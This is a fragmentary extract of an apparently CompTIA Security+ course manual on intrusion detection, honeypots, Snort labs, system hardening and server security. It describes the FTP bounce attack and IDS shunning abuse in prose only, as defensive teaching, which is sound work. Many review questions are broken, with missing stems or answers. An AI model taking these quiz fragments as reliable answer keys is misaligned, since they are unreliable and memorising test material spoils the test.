Explanation Host-based IDS are used to protect a critical network server containing sensitive information. Host-based IDS agents (the actual HIDS software) only protect the host on which they are installed. Like any application, host-based IDS agents use resources on the host server (disk space, memory, and processor time), which can have some impact on system performance. HIDS can detect intrusions by analyzing the logs of operating systems and applications, resource utilization, and other system activity. Host-based IDS are primarily used to protect only critical servers, because it is not practical or costeffective to install them on all systems. HIDS method of operation Host-based intrusion detection products have a wealth of methods that can be employed to detect and stop intrusions. A list of the more common techniques employed by modern HIDS products includes: Auditing of logs, including system logs, event logs, security logs, and syslog (for Unix hosts). Monitoring of file checksums to identify changes. Elementary network-based signature techniques including port activity. Intercepting and evaluating requests by applications for system resources before they are processed. Monitoring of system processes for suspicious activity. Log files Most HIDS products audit log files by monitoring changes to them. If a log file is changed, the HIDS product checks the new entry to see if it matches any of the HIDS attack signature patterns. If the log entry does match the attack signature, the HIDS alert administrators. Note that because logs reflect past events, file auditing cannot stop the action that sets off the alarm from taking place. File checksums File checksums are similar to log file audits in that they can detect past activity. Hashes are typically created only for critical system files that should change infrequently if at all. If frequently changing files are included in the file audit, the administrator will need to tune the IDS so that it does not generate alerts every time these files are changed. The tuning process can be used by administrators to learn which files they should expect to change and which should remain static. File checksum systems such as Tripwire can also be employed when full-fledged HIDS products are not available or practical for a particular environment. (Tripwire scans file systems and creates hashes of critical system files. The hashes are saved, and the program is periodically rerun to validate that the hash value for each file has not changed.) By employing such a product, administrators can be notified when an intrusion has occurred (because the attacker will almost certainly upload tools or change permissions to make access to the machine easier), and can be certain which files have been tampered with by the intruder. The modified files can be easily identified and refreshed from backups, eliminating the need to completely rebuild the server.
1211
Host-based IDS are deployed by installing agent software on the system to be protected. There are two main types of host-based intrusion detection software: host wrappers (some of which are thought of as desktop or personal firewalls) and agent-based software. Either approach is much more effective in detecting trusted-insider attacks (so-called anomalous activity) than is network-based ID, and both are relatively effective for detecting attacks from the outside. However, host wrappers do not have the ability to provide the in-depth, active monitoring measures that agent-based HIDS products have. Host wrappers tend to be inexpensive and deployable on all machines in the enterprise, while agent-based applications are more suited for single purpose servers. Examples of host wrappers are Internet Security Systems (formerly Network ICE and then Black ICE Defender ) BlackICE PC Protection and BlackICE Server Protection (www.iss.net). An example of a full-fledged agent HIDS product is McAfees Entercept host-based IDS product (mcafee.com/us/products/mcafee/host_ips/category.htm). These products have evaluation versions that can be downloaded and used on a trial basis. HIDS active monitoring capabilities When an attack is flagged, host-based IDS have a similar menu of options to that of network-based IDS. However, given that the HIDS have access to the hosts operating system, the HIDS have more power to end attacks with more certainty. List of options commonly used by HIDS agents include: Log the event Alert the administrator Terminate the user login Disable the user account Logs of an offending event that trigger a response from an agent are obviously a useful thing for administrators to review in performing a post mortem on an attack. Administrators can be alerted through an IDS management console (an application responsible for receiving alarms from IDS agents), by sending an e-mail, or by sending SNMP traps to a network management system. The ability for host-based intrusion detection systems to stop attacks in progress by forcing the offending account to log off or disabling it altogether is what makes hostbased IDS an effective security tool and one that compliments network-based IDS and firewalls. Those HIDS products with a high degree of OS integration and which can intercept requests for system resources can go a step further by preventing access to memory, processor time, and disk space altogether.
1213
B-2:
2 In protecting applications, the host sensor agent monitors which areas of application activity? (Choose all that apply.) A B C D E
F
Program files Data file Registry settings Services Users All of the above
3 HIDS can stop an attack in progress by forcing the offending account to log off or disabling it altogether. True or false?
True
Can verify success or failure of an attack by reviewing log entries. Monitor user and system activities. Protect against attacks that are not network based, such as physical attacks. Are not limited by switched infrastructures. React quickly to intrusions. All of the above.
Intrusion detection
1215
This feature is often referred to as IDS shunning or blocking. Another option is for the active IDS system to send a TCP reset, using the spoofed IP address of the attacker, to the victim host, causing the attacking session to be killed. The TCP reset is illustrated in Exhibit 12-3. Although active systems might seem far superior because of their ability to block undesirable traffic, those features must be used with extreme care. Because IDS has not matured to a point where false positives are very low, enabling shunning features on IDS can cause legitimate traffic to be inadvertently blocked. Worse, attackers can use the IDS to create denial-of-service attacks where legitimate users IP addresses or subnets are blocked from entering the network. Active IDS features tend to be used only in networks where the IDS administrator has carefully tuned the sensors behavior to minimize the number of false positive alarms.
.2X
The relevant part of the signature definition, the content field, appears in bold type. Notice that it matches the sniffer trace. Snort examines every packet that enters its monitoring NIC and compares the data payload against this signature. If there is an exact match, then Snort alerts the administrator that it has identified an attack using a Back Orifice port scanner. It is important that only attacks and no benign traffic should match the signatures, otherwise false alarms are generated. The signature detection method is good at detecting known attacks, but requires the sensors database be maintained with current signatures; otherwise, new attacks are not detected. A well-crafted signature nearly always detects the attack it represents, but other packets might also match the signature and generate false alarms. When false positives occur, IDS administrators tune the sensor by carefully determining the cause of the alarm. If the alarm is irrelevant (as it would be if it represented a Windows exploit when the network has only Unix hosts), then the administrator can safely configure the sensor to ignore the signature. If the alarm is required, then the alarms context would be modified to prevent a repeat occurrence. Most signature systems are easily customizable, and knowledgeable users can create their own signatures. One problem with signature-based detection techniques is the large number of signatures required to effectively detect misuse. Since a separate signature is needed for each type of attack, a complete database of signatures can contain several hundred entries. The more signatures that each passing packet must be compared against, the slower the NIDS sensor operates. If a sensor operates too slowly, it misses packets and potentially misses attacks as well. Despite this challenge, signature-based intrusion detection is quite popular and works well in practice when configured correctly and monitored frequently. Anomaly detections Anomaly detection takes the opposite position from signature detection. Rather than operate from signatures that define misuse or attacks on the network, anomaly detection creates a model of normal use and looks for activity that does not conform to that model. The difficulty in anomaly detection is in creating the model of normal network activity (or use model). One method of creating the use model selects key statistics about network traffic to recognize normal activity. Unfortunately, too much statistical variation makes models inaccurate, and events classified as anomalies might not always be malicious. For example, a companys employees might have the habit of returning to their desks and checking their e-mail immediately following a monthly departmental meeting. The resulting spike in activity is not normal for that time of the day or week, so the anomalybased IDS might label it as a denial-of-service attempt against the mail server.
Intrusion detection
1217
Another problem with anomaly-based detection is the inability to create a model on a completely normal network. Anomaly detection systems must create a normal use model by monitoring traffic on the specific network that they will defend. However, the network might already contain malicious activity, especially if it has an Internet connection. Any use model created from such a network would implicitly ignore such preexisting malicious activity, viewing it as normal. Anomaly detection systems arent as popular as signature detection systems because of high false alarm rates created by inaccurate models of normal use.
ealaddin.com
Cisco Systems, Inc.
cisco.com
Computer Associates Intl.
ca.com
Cylant Technology
cylant.com
Enterasys Networks Inc.
CylantSecure product purports to protect against even unknown types of attacks by preventing any anomalous server activity. Dragon family includes network monitors, host-based IDS, and central console. A major player in the market, provides integrated host- and networkbased IDS. Offers SecureNet family of IDS products.
enterasys.com
Internet Security Systems Inc.
iss.net
Intrusion.com Inc.
intrusion.com
NFR Security
nfr.com
Snort
Sentivist -IDS monitors packet fragments and reassembled packets, and provides customization capabilities. The home of the well-known open source IDS, Snort.
snort.org
Symantec Host IDS www.symantec.com Sourcefire, Inc. Symantec Host IDS provides prevention, real-time monitoring and detection of security breaches. Open source network intrusion detection software, including Intrusion Sensor and Snort. Based on the former freeware tool, product detects breaches by monitoring files for unauthorized changes.
sourcefire.com
TripWire Inc.
tripwire.com
C-1:
2 A system has been developed to classify intrusion detection systems based on how they detect malicious activity. What are the major categories?
A B
Signature detection Anomaly detection Abnormal detection Intrusion penetration All of the above
C D E
3 Which type of IDS can only take logging and alerting types of actions when an attack is identified? A B
C
4 What is a method of detecting intrusion in which the IDS analyze the information they gather and compare it to a database of known attacks? A B C
D
B C D
Intrusion detection 6 Which method of IDS is best suited for detecting Trojan horses such as BackOrifice? A B
C
1219
B C D
Topic D: Honeypots
This topic covers the following CompTIA Security+ exam objective:
# 3.4 Objective Differentiate the following types of intrusion detection, be able to explain the concepts of each type, and understand the implementation and configuration of each kind of intrusion detection system Honey Pots
Intrusion detection
Commercial honeypot Decoy Server symantec.com Specter specter.com Comments
1221
Decoy Server provides complete operating systems for attackers to interact with, and has good monitoring, data collection and notification capabilities. An easy-to-use commercial honeypot designed to run on Windows, Specter can emulate several different operating systems, monitor every ICMP packet, TCP connection and UDP datagram, and has a variety of configuration and notification features. A commercial honeypot appliance with extensive detection and emulation capabilities.
PacketDecoy palisadesys.com
Free honeypot BackOfficer nfr.com/resource/backO fficer.php Deception Toolkit all.net/dtk/dtk.html Honeyd www.honeyd.org
Comments A free Windows-based honeypot, BackOfficer is extremely easy to use and runs on any Windows platform; a good beginners honeypot. A collection of Perl scripts and C source code that emulate a variety of listening services, DTKs primary purpose is to deceive human attackers. Introduced a variety of new concepts, including the ability to monitor millions of unused IPs, IP stack spoofing, and to simulate hundreds of operating systems at the same time. Not a program, but an entire network of systems designed to be compromised. An open source solution that allows you to run multiple operating systems (and honeypots) at the same time, UML also has honeypot functionality, including the ability to capture the attackers keystrokes from kernel space; UML allows you to create an entire honeynet on a single computer.
1223
D-1:
Heres how
See the classroom setup instructions for location of the download file. Students will have to work in pairs on this activity.
1 Download and install a copy of BackOfficer Friendly according to your Instructors directions
2 In the Taskbar, right-click the BackOfficer Friendly icon and choose Details 3 On the menu bar, choose
Options To view the Options menu.
4 What types of scans can be performed with this utility? 5 Select Listen for Telnet 6 At your partners computer, open a command window 7 Enter telnet 8 Enter o, followed by your partners computers IP address 9 At your own computer, observe what happens in the BackOfficer Friendly window
BackOfficer Friendly can listen for Back Orifice, FTP, Telnet, SMTP, HTTP, POP3 and IMAP2.
D-2:
Heres how
See the classroom setup instructions for location of the download file.
1 Download and install SuperScan 4 according to your Instructors direction 2 With BackOfficer Friendly still active, enter your computers IP address into the Hostname/IP box Click the right arrow next to your IP address 3 Click the blue arrow toward the bottom of the window 4 Switch back to BackOfficer Friendly
To add the IP address as an address to be scanned. To start the scan. Youll see the results being displayed in the field at the bottom of the screen. If the window didnt already pop up during the scan. The SuperScan activity displays in the window.
Intrusion detection
1225
IDS monitoring
It is an unpleasant fact that the IDS needs to be monitored. Early on in their deployment, intrusion detection systems are likely to generate a high number of false positives; and though these will decrease as the IDS is tuned, the alarms still need to be investigated to determine how to tune the IDS. Later on, when the IDS installation is mature, an IDS alarm is a serious event that requires a response. Some network operations centers have 24 by 7 monitoring, but operations staffs rarely have the experience or skills to deal with an intrusion. To monitor the IDS effectively, organizations need to have well-documented monitoring procedures that detail actions for specific alerts. When operations personnel receive an IDS alert, they can refer to these procedures to determine whom to contact and what actions should be taken immediately, based on the type of alarm generated by the IDS.
1227
E-1:
Security Information Response Team System Information Response Team Security Incident Response Team None of the above
Determine how the incident happened. Establish a process for avoiding further exploitations of the same vulnerability. Avoid escalation and further incidents. Assess the impact and damage of the incident. Recover from the incident. Update procedures as needed. Determine who was responsible (if appropriate and possible). All of the above.
Topic B
Topic C
Topic D
Topic E
Review questions
1 What is the defense in depth security strategy?
A multi-layered security approach that uses multiple techniques such as preventative technologies, security monitoring, and attack response to provide a robust security architecture.
2 Specify if each of the following are true or false positives or negatives. Occur when the IDS correctly identifies undesirable traffic.
True positive
3 False negatives imply that the IDS failed to detect an attack. True or false?
True
4 False positives happen when the IDS mistakenly reports certain benign activity as malicious. True or false?
True
Intrusion detection
1229
5 What is the difference between host-based and network-based intrusion detection systems?
Network-based IDS (NIDS) monitor network traffic while host-based IDS (HIDS) monitor activity on a particular host machine.
8 What are the typical reaction types for network IDS reactions?
TCP resets, IP session logging, and shunning or blocking.
9 HIDS audit log files, monitor file checksums, evaluate requests by application for system resources, and monitor system processes for suspicious activities. True or false?
True
10 HIDS can only detect intrusions after the fact rather than proactively protecting the host. True or false?
False
B Honeypots should never use the normal operating system. C Only real data is of interest to attackers so phony data should never be used. D Honeypots should only be placed outside the firewall.
17 Early on in their deployment, intrusion detection systems are likely to generate a high number of false negatives. True or false?
False. When first set up, they are likely to generate false positives.
18 A well-documented monitoring procedure specifies whom operations personnel should contact. Information about what to do about the intrusion is not included in this document. True or false?
False. The document does include this information.
19 Deployment of a honeypot is seen by some as entrapment and, according to them, is therefore unethical. True or false?
True
1231
After completing this activity, youll be able to understand how to use Snort to capture data packets, view the contents of the data packets, and create log files. Note: The servers used in this activity will be referred to as Server-X and Server-Y. Please substitute the names of your servers for these names. 1 On Server-X, click Start, Run, and type cmd. 2 Click OK. 3 Type cd \snort\bin and press Enter. 4 Enter snort W. Youll see a list of the available interfaces, each with a number assigned to it (1, 2, and so on). 5 Type snort v i followed by the number of the interface you want to listen to. For example, you might type snort v i 2 to listen to interface 2. 6 Press Enter. Youll see a screen similar to the one shown in Exhibit 12-4 below.
Exhibit 12-4: The snort interface initialization screen 7 On Server-Y, click Start, Run, and type cmd. 8 Click OK. 9 Type ping Server-X and press Enter. 10 On Server-X, view the results, as shown in Exhibit 12-5. Notice the ECHO and ECHO REPLY.
Exhibit 12-5: A Snort ping capture 11 On Server-X, press Ctrl+C to view the statistics, as shown in Exhibit 12-6. Notice that the protocols used were ICMP and ARP.
Exhibit 12-6: Snort ping capture statistics 12 On Server-X, at the command line enter snort v d i followed by the interface number to view the packet data. 13 On Server-Y, enter ping Server-X. 14 On Server-X, view the results. Youll see a screen similar to the one shown in Exhibit 12-7.
Intrusion detection
1233
Exhibit 12-7: A Snort ping capture with data 15 On Server-X, press Ctrl+C. 16 On Server-X, enter snort dev l \snort\log K ascii i followed by the interface number to log results to a log file. 17 Ping Server-X from Server-Y. 18 On Server-X, press Ctrl+C. 19 Navigate to the C:\snort\log folder and examine the contents. Use Notepad to open the files in the subfolder(s). 20 Repeat Steps 1 through 20 above in Server-Y. 21 Close all Windows. Creating a Snort rule set In this activity, youll create a simple Snort rule to alert you when the ICMP protocol is used. After completing this activity, youll be able to create a Snort rule set, and test the rules set on the network. Note: The servers used in this activity will be referred to as Server-X and Server-Y. Please substitute the names of your servers for these names. 1 Log on to Server-X as Administrator. (If necessary.) 2 Click Start, Run, and type notepad. 3 Click OK. 4 Enter the information shown in Exhibit 12-8.
Exhibit 12-8: A Snort rule set 5 Save the file as c:\snort\new.rules. Close Notepad. 6 Rename c:\snort\new.rules.txt to c:\snort\new.rules. Accept the format change when prompted. 7 On Server-X, open a Command window. 8 At the command line, enter cd \snort\bin. 9 At the command line, enter snort c \snort\new.rules K ascii l \snort\log i followed by the interface number. 10 From Server-Y, open Internet Explorer and enter http://Server-Xs IP address in the address box. Press Enter. 11 On Server-X, press Ctrl+C. 12 Navigate to the C:\snort\log folder. 13 In Server-Ys subfolder, examine the Web Traffic Logged in the TCP_*-80.ids files. It should look similar to Exhibit 12-9.
Intrusion detection
1235
14 On Server-X, change to the c:\snort\bin directory and then enter snort c \snort\new.rules K ascii l \snort\log i followed by the interface number. 15 On Server-Y, ping Server-X. 16 On Server-X, press Ctrl+C. 17 Navigate to the C:\snort\log folder. 18 Examine the contents of the alert.ids file. It should look similar to the one shown in Exhibit 12-10.
Exhibit 12-10: A Snort ICMP traffic alert log 19 Repeat steps 1-18 above on Server-Y. 20 Close all Windows and log off Server-X and Server-Y.
131
practices, including firmware updates, access control lists, and configuration best practices.
C Harden application-layer servicessuch as
Web, e-mail, FTP, DNS, file/print, DHCP, and database repositoriesagainst attacks.
D Explain how to properly configure
workstations and servers and implement personal firewall software and antivirus packages.
132
Security baselines
133
Its extremely important, therefore, for system administrators to protect the integrity and availability of operating systems from outside threats. Actions that could disrupt the functionality of a system can be categorized as follows: AttacksThese are intentional acts by malicious individuals either to gain unauthorized access to user data and system resources or to compromise other targets. MalfunctionsThese are hardware or software failures that may prevent a system from performing its tasks. ErrorsThese are unintentional acts, by external or internal users, that may adversely affect the functionality of a system.
Best practices
Although its almost impossible to achieve complete security of a system when its deployed as part of a network, IT managers can follow certain guidelines to safeguard the system from intruders. Following is a common list of best practices for operating system hardening: Identify and remove unused applications and services, which, if compromised, can reveal sensitive information about a system. Remove unused or unnecessary file shares. Implement and enforce strong password policies. Force periodic password changes. Remove or disable all expired or unneeded accounts. Limit the number of administrator accounts available. Set necessary privileges to ensure that resources are accessible on an as-needed basis. Set account lockout policies to discourage password cracking. Keep track of the latest security updates and hot fixes. Apply vendor-suggested upgrades and patches as they are made available. Back up the system on a periodic basis for restoration in case of emergency. Log all user account and administrative activity so you can conduct forensic analysis if the system is compromised. Documentation Keeping an external log of each critical system can increase system integrity and make future security-related maintenance much simpler. This hard log should include a list of all software and version numbers that are installed on the system. As users, groups, and access privileges are defined, and other critical decisions are made during the baselining process, they should be recorded in this document. Records of all backups and upgrades should also be maintained in this single reference. When a security patch is recommended for a certain combination of operating system and applications, you wont need to dig around in your active system to see if it applies; simply refer to the paper logs. A recommended method is to use a composition book for each critical system. Its obvious when pages are removed (they never should be), and its easy to take with you to analyze.
134
Do it!
A-1:
Heres how
1 Log on to your server as Administrator
See the classroom setup instructions for location of the download file.
2 Download mbsasetup-en.msi according to your Instructors directions 3 Double-click the mbsasetupen.msi file Click Next 4 Select I accept the license
agreement
Click Next 5 Click Next 6 Click Install 7 Click OK 8 Click Start, then choose All
Programs, Microsoft Baseline Security Analyzer 2.0 To acknowledge that the installation has finished. To start the program. To use the default folder.
135
(In the lower-left corner of the window.) Security update information downloads from the Internet and the scan begins. Note that this process may take some time to complete. The report shows what was scanned, the results of the scan, and how to fix any problems.
11 After the scan is complete, view the report 12 Close all windows
136
Do it!
A-2:
Deny data access to all users but a select few. Identify and remove unused applications and services. Implement and enforce strong password policies. Limit the number of administrator accounts.
2 Which of the following are not actions that could disrupt the functionality of a system? A B C
D
3 Which of the following three statements about OS/NOS hardening is not true? A
B
OS/NOS hardening includes removal of unnecessary programs. OS/NOS hardening includes application hardening. OS/NOS hardening includes applying or adding patches to the system kernel.
Security baselines
137
File systems
Explanation File systems store data necessary to enable communication between an application and its supporting disk drives. File systems require special attention when youre securing the OS. Strong file-system security can not only stop inside file tampering but also stop hackers who have gained access to the system but not the files. Access privileges Operating systems provide the capability to set access privileges for files, directories, devices, and other data or code objects. Setting privileges and access controls protects information stored on the computer. Common privileges that can be set on files and directories are Read, Write, and Execute privileges. Denying Read access protects confidentiality of information. Denying Write access protects the integrity of information from unauthorized modification. Restricting execution privileges of most system-related tools to system administrators can prevent users and attackers from making intentional or unintentional configuration changes that could damage security. The principle of least privilege states that users should have the minimum amount of access needed to perform their jobs. Although it may be easier to give all employees access to a file repository so that they can easily share a file as its being modified, this practice opens up many possibilities for a breach of security. It might also be necessary to distinguish local access privileges from network access privileges. Application programs may request and be granted increased access privileges for some of their automated operations. On the other hand, a system administrator may want to limit users privileges based on their required scope. This can be done in a number of ways, as outlined in the following sections. Setting user and group privileges To assist in privilege assignment, the administrator should determine user groups and object groups, and identify required access for each object (file, directory, device) by each user group within the system. When setting privileges for users, you can usually simplify both the initial task and future updates by grouping users by common needs. Most operating systems allow rights to be granted to a group, which then propagates those privileges to all members of the group. For instance, all corporate accountants may have access to a folder of resources, accounting software, and several printers in a section of the building. Rights to each of those resources could be granted to the accounting group, and all accountants could be added to that group. If a new, generally available accounting resource is added, an administrator need only add it to the accounting group for all accountants to have access. Similarly, when an accountant is transferred to a different division, his or her user account is removed from the accounting group, thereby revoking in a single action the multiple accounting privileges that are no longer needed. Using groups does not prevent you from granting additional rights to a single user. Those would simply be added directly to the user account. Be sure to identify rights that are made available to a set of users because those users might be better represented by a group of users. Its also possible for a single user to gain privileges via membership in multiple groups in addition to those rights granted explicitly.
138
Emphasize that these are only guidelines, and adjustments might be needed to suit a particular environment. Remind students that the ultimate goal is to provide users with the least amount of access needed to accomplish their jobs.
When creating user groups, a system administrator configures the operating system to recognize the user groups, and then assigns individual users to the appropriate groups. Then, the system administrator configures access controls for all protected files, directories, devices, and other objects. The administrator should document all the configured permissions along with the rationales for them. Following are some of the common practices for setting file and data privileges: Restrict access of operating system source files, configuration files, and their directories to authorized system administrators. For UNIX systems, there should be no world-writable files unless specifically required by necessary application programs. For Windows NT-based systems, there should be no permissions allowing the Everyone group to modify files. For UNIX systems, if possible, mount file systems as read only and nosuid to preclude unauthorized changes to files and programs. Assign an access permission of immutable to all kernel files if its supported by the operating system (such as Linux). Establish all log files as append only if that option is available. Prevent users from installing, removing, or editing scripts without administrative review. Otherwise, malicious users could exploit these files to gain unauthorized access to data and system resources. Pay attention to access control inheritance when defining categories of files and users. Ensure that you configure the operating system so that newly created files and directories inherit appropriate access controls, and that access controls propagate down the directory hierarchies as intended when you assign them. Administrators should disable a subdirectorys ability to override top-level security directives unless that override is required. Malicious users can exploit a failure to use such practices and gain unauthorized access to other parts of the system. Implementing access control with Windows Server 2003 security templates One of the more difficult tasks for an administrator is determining the appropriate security settings for a network. There are so many possibilities that its very easy to miss an important setting, often resulting in a network full of security holes. Microsoft has created security templates to assist administrators with this task. In addition, Microsoft gives administrators the ability to create custom templates.
Do it!
A-3:
Heres how
1 Choose Start, Run Type mmc and press e 2 Choose File, Add/Remove
Snap-in
3 Click Add
139
Click Add 5 Click Close 6 Click OK 7 Expand Security Templates 8 Expand C:\Windows\Security\Templates 9 Right-click C:\Windows\Security\Templates Choose New Template 10 Enter My Template Leave the description blank Click OK 11 Select and then expand My
Template From the shortcut menu. For the template name.
To open the Add Group dialog box. To specify the group object.
Click OK 19 Click OK
To Configure this key then Propagate inheritable permissions to all subkeys.
20 Close the Console1 Window 21 Save the Console with the name
My Console
22 Click Yes
Security baselines
1311
1313
A-4:
Create the necessary user groups. Configure access controls. Configure file encryption. Avoid drive partitions.
2 System administrators should disable ___________ permissions for all executable files and binary files.
Write/Execute
4 When youre setting file system permissions, individual user accounts should be assigned access whenever possible. True or false?
False. The principle of least privilege should be applied.
5 Which of the following are common practices for setting file and data privileges? A B C Restrict access of operating system source files, configuration files, and their directories to authorized system administrators. Establish all log files as append only if that option is available. Prevent users from installing, removing, or editing scripts without administrative review. Otherwise, malicious users could exploit these files to gain unauthorized access to data and system resources. Pay attention to access control inheritance when defining categories of files and users. All of the above.
D
E
Firmware updates
Generally speaking, firmware is programming that is inserted into erasable programmable read-only memory (erasable programmable ROM), thus becoming a permanent part of a computing device. Samples of firmware are the PC system BIOS and router and switch boot code. Firmware is created and tested like software (using micro code simulation). Firmware updates can be made available by the vendors as vulnerabilities and malfunctions are discovered within previous versions. When ready, such updates can be distributed like other software and, using a special user interface, installed in the programmable readonly memory by the user. Administrators should keep track of vendor announcements to determine if they apply to their systems, and upgrade firmware on their network devices as suggested by vendors.
Security baselines
1315
Network configuration
Networks typically facilitate data transmission by a process called routing. Routing is the process of deciding the disposition of each packet that a router receives, and then either forwarding or discarding the data packet. Routers store destination addresses in a data structure called the routing table. It can dynamically update its address base through interactions with other routers. The routing mechanism decides whether to forward or discard a packet by using the destination IP address in the packet header. Routing functions and supporting structures are designed to route packets efficiently and reliably, not securely. Therefore, a routing process should not be used to implement security policy. Rather, firewall systems should govern security of information flow into and out of the network. Most firewall systems routing configurations are static, and hence less receptive to attacks. Assigning network addresses for interfaces on a firewall device Each network to which a firewall device is attached has a procedure to obtain new IP addresses. For the Internet, IP addressing is typically obtained from the Internet service provider (ISP) that connects to the firewall. For internal networks, including configured demilitarized zone (DMZ) networks, administrators can obtain IP addresses from within the organization. The IP addresses used internally typically come from the RFC 1918 IP address specification, which is not routable across the Internet without necessary translation. Establishing the routing configuration A firewall systems routing table contains a list of IP addresses for which the firewall system provides routing services. The routing decision is made based on the destination network address of the data packet being processed by the firewall. If the destination address exists in the routing table, the table provides the address of the next hop. If there is no next hop associated with the destination, the packet is discarded. An Internet Control Message Protocol (ICMP) unreachable message, indicating that the packet was undeliverable, may be returned to the source. When youre replacing an existing firewall system, its important to understand the network topology described by the routing configuration. The routing configuration of the new firewall system must be consistent with the current system. An organizations network security policy should require that the routing configuration of a firewall system be performed in an environment isolated from the production network. This policy should also specify what connectivity is to be permitted with the specific statements and deny all other connectivity. The routing configuration is derived from the network topology and should not be used to implement aspects of an organizations security policy. Some firewall designs implement a two-tier firewall architecture with a DMZ so that all inbound and outbound packets travel through both firewall systems. In these designs, the outside firewall is typically configured with more general packet-filtering rules. As packets move toward the internal network, filtering rules become more specific and complex.
Security baselines
1317
B-1:
2 ____________ is a function of IP routing that allows the packet originator to influence routing decisions as the packet traverses networks.
Source routing
4 For best security on routers, never configure a loopback address. True or false?
False. Always configure a loopback address. The loopback interface allows you to access a device regardless of the status of the primary physical interface.
5 The SNMP ____________ community string can be used to make changes in a router configuration.
Read/Write
6 SNMP has two types of communities. Identify them from the list provided. A
B
C
D
7 ____________ is a useful feature to allow TCP data packets into your internal network, given that the data traffic is initiated from your internal network.
Filtering
Security baselines
1319
B-2:
Managing services and protocols with Windows Server 2003 security templates Heres why
To apply a Windows Server 2003 security template and evaluate the results. Microsoft offers security templates at three primary levels: basic, secure, and high secure. The issues surrounding the use of these templates are unknown. Because the administrator is relying on Microsoft to secure the server, the settings are difficult to track.
Heres how
1 Choose Start, Run
1321
11 In the File name box, enter My Database Click Open 12 Select the securedc.inf template Click Open 13 Right-click Security
Configuration and Analysis To import the template.
16 Explore the log file 17 Close My Console and save the changes 18 Close all other open windows
B-3:
2 Which of the following actions are safeguards against DoS attacks targeting services and protocols? A B C D
E
Disable services that are not needed for Internet-based operations. Review, configure, and monitor services that are necessary for Internet connectivity. Apply software patches to fix known vulnerabilities. Block access on corresponding ports on the Internet border routers. All of the above.
3 Most SMTP- and FTP-specific vulnerabilities stem from sloppy configuration and unapplied or misapplied patches. True or false?
True
Security baselines
1323
Exhibit 13-2: Isolating a Web server on a DMZ Configuring a Web server for access privileges Most operating systems for Web server hosts can be configured for access privileges for files, devices, and other data or code objects stored on a host. Any information that your Web server can access by using these controls can potentially be distributed to all users accessing the public Web site. The Web server software is likely to provide additional object, device, and file access controls specific to its operation. Taking the following two perspectives, administrators need to consider how best to configure access controls to protect information stored on the same hardware as your public Web server: To limit the access to the Web server software To apply access controls specific to the Web server where more detailed levels of access control are required Properly configured access controls can prevent the disclosure of sensitive or restricted information that is not intended for public dissemination. In addition, access controls can limit resource use in the event of a DoS attack against your public Web site.
1325
Logging can help administrators identify the sources of attacks as well as other problems and can help indicate the appropriate actions to take to prevent such events from reoccurring. On many servers, the Web service is among the most active and accessible. Considering security implications A Web server listens for a request and responds by transmitting the specified file to the requestor. The Web server might invoke additional mechanisms to execute programs or to process user-supplied data, producing customized information in response to a request. Examples of these mechanisms include Common Gateway Interface (CGI) scripts and server plug-ins. For example, CGI scripts can be used to interface with search engines and databases, create dynamic Web pages, and respond to user input. Because these features allow outsiders to upload data to the server, administrators need to assess the security risks and implications before applying such components. Configuring authentication and encryption The public Web server may need to support a range of technologies for identifying and authenticating users who may have different privileges for accessing information. Some of these technologies are based on encryption technology, providing a secure channel between a Web browser client and a Web server. Examples of such tools include Secure Sockets Layer (SSL), Secure Hypertext Transport Protocol (S-HTTP), and Secure Electronic Transaction (SET). Before placing any sensitive or restricted information on a public Web server, administrators need to determine the specific security and protection requirements and confirm that the available technologies can meet these requirements.
E-mail servers
E-mail is arguably considered the most important service to protect, considering its overall impact on the operations of any given organization. Companies often have e-mail from the Internet directly entering their e-mail servers for delivery to internal users. There are serious risks associated with the ability to receive e-mail from the outside world. The widespread adoption of e-mail through the years has been accompanied by the development of malicious code such as e-mail viruses and attacks. E-mail has enabled attackers to distribute harmful content to the internal network. An attacker can easily circumvent the protection offered by a firewall by tunneling through the e-mail protocol because a typical firewall does not inspect e-mail and its contents. Attachments with malicious contents In such attacks, the attacker typically tries to get the user to activate an attachment to execute its malicious contents. Although system administrators are commonly blocking files with certain extensions, attackers can overcome such precautions by renaming extensions (such as renaming an .exe extension as .bat). Furthermore, such malicious attacks could try to take advantage of the trust relationship between users, whereby, if a user activates an attachment, the attachment could trigger the sending of malicious code to other colleagues in the victims address book. Worms, such as AnnaKournikova and Melissa, take advantage of such capabilities.
Security baselines
1327
FTP servers
File Transfer Protocol (FTP) is used to transfer files between a workstation and an FTP server. When ftp appears in a URL, it means that the user is connecting to a file server to either upload or download a file. Most FTP servers require the user to log on to the server to transfer files. The original specification for FTP contains a number of mechanisms that can be used to compromise network security. The following sections list the vulnerabilities associated with FTP. Protecting against bouncebacks FTP, as specified in the RFC standard 959, presents a security breach for attacking wellknown network services on a remote server by using the FTP service on a third-party server. The attack involves sending an FTP PORT command to an FTP server containing the network address and the port number of the server or service being attacked. The attacker can instruct the FTP server to send a file to the service being attacked on the victim system. Such a file may contain commands relevant to the service being attacked (such as SMTP). Using the FTP server to connect to the service on the attacked machine, rather than connecting directly, makes tracking down the attacker difficult. For instance, a client uploads a file containing SMTP commands to an FTP server. Then, using an appropriate PORT command, the client instructs the server to open a connection to the attacked servers SMTP port and upload the file containing SMTP commands to the victim machine. This may allow the client to forge mail on the third machine without making a direct connection; this makes it difficult to track the attacker. TCP port numbers in the range 0 to 1023 are reserved for well-known services such as mail, Telnet, and FTP control connections. The original FTP specification makes no restrictions on the TCP port number used for the data connection. Therefore, using the proxy FTP scenario described here, attackers can instruct an FTP server to attack a wellknown service on the victim machine. To prevent such attacks, administrators should configure their servers not to open data connections to TCP ports lower than 1024. A server that receives a PORT command containing a TCP port number less than 1024 should be configured to return response type 504 (Command not implemented for that parameter). Disabling the PORT command and using proper file protections to prevent attackers from executing unauthorized transfer of files are other solutions for preventing bounceback attacks. However, disabling the PORT command also prevents proxy FTP, which may be required in certain situations. Restricting areas System administrators may want to restrict access to FTP servers that store confidential or corporate data. These restrictions could be set based on the network address of the client making the file transfer request. In such cases, before allowing the transfer of restricted files, the server should confirm that the network address of the client making the request on both the control connection and the data connection is within the organizations address space. Checking the address range for both the control and data connections protects the server from situations in which the server establishes a control connection with a trusted host but the data connection is misdirected. Using network addresses to establish FTP control and data connections leaves the FTP server vulnerable to IP spoofing attacks. In such cases, the attacker could assume a trusted IP address to download restricted files. Using strong authentication mechanisms can prevent such risks.
1329
C-1:
Use file-system access controls on server files and directories that are not for public viewing. Use Web server logging. Verify the safety of any types of CGI scripts and plug-ins that are executed on the Web server. Isolate the Web server on a DMZ. Use authentication and encryption technologies as necessary, including SSL and S-HTTP.
2 List some of the ways attackers can affect networks or hosts with e-mail.
